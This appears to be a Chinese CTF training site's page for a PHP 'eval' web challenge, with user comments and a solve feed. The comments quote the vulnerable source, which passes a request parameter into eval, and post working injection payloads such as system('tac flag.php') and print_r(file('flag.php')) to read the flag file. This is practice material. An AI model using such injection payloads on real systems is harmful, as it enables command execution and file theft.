evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 13935
提  示:
描  述:
eval
...
登录回复
评论
safemaker2021 3年前
举报

把file函数带进去eval中,以PHP执行

回复 0
Easyoung 3年前
举报

直接在评论里发flag,年轻人不讲武德?

回复 2
sn1p3r 3年前
举报

@harry 看到管理员三个字,熠熠生辉。

回复 1
harry 管理员 3年前
举报

动态flag他们发了也没事

回复 11
xiao 3年前
举报

直接用?hello=file('flag.php'),var_dump()函数可以打印

回复 17
wyx48046 3年前
举报

厉害!

回复 0
Hiiro 3年前
举报

大佬大佬

回复 0
test_ctf 3年前
举报

牛逼!

回复 0
Hacker23 3年前
举报

http://114.67.246.176:10183/?hello=system('tac flag.php')

回复 12
ZTyyds 2年前
举报

原理是什么啊???想了解一下

回复 0
guoguo 3年前
举报

题目内容:<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 可以使用hello=system('tac flag.php')或者?hello=10/print_r(file("flag.ph

回复 3
dsadscxzewq 3年前
举报

为啥用cat不行呢?

回复 0
痕夕 3年前
举报

看不懂,求解,大佬

回复 6
SwBack 3年前
举报

大道至简,直接当作一句话利用即可 hello=system('tac flag.php')

回复 5
巨人肩膀上的矮子 2年前
举报

@dsadscxzewq cat是可以的,只不过在源代码里查看

回复 0
dsadscxzewq 3年前
举报

为啥用cat不行呢?

回复 1
BBBugku 3年前
举报

F12查看源代码,且根据题目描述可以得知flag在flag.php文件中,且在源代码中发现hello并未赋值,因此只需在原有的url后添加 /?hello=10/print_r(file("flag.php")) ,刷新网页,找到flag。

回复 14
krystalll 3年前
举报

感谢

回复 3
lurnco 3年前
举报

Too young Too simple

回复 3
Discuze奇 3年前
举报

我的金币不太允许了呀。。。

回复 1
lurnco 3年前
举报

可以创个小号做后面的题人?

回复 0
1amer 3年前
举报

直接读文件吧

回复 0

WriteUp

image
harry

1 金币

立即查看

评分(9)

解题动态

xinkuang 攻破了该题 5小时前
yzx666 攻破了该题 9小时前
Barium 攻破了该题 9小时前
15762905283 攻破了该题 10小时前
pb9231 攻破了该题 14小时前
洁念lb 攻破了该题 20小时前
suny 攻破了该题 20小时前
1214337223 攻破了该题 1天前
Yb9msxx 攻破了该题 1天前
DJCARL 攻破了该题 1天前
wzh98 攻破了该题 1天前
Asamllcoder 攻破了该题 1天前
wzy666 攻破了该题 1天前
regal 攻破了该题 1天前
kirds 攻破了该题 1天前
1075549762 攻破了该题 1天前
Graito 攻破了该题 1天前
huanying1247 攻破了该题 2天前
redsuke 攻破了该题 2天前
941853820 攻破了该题 2天前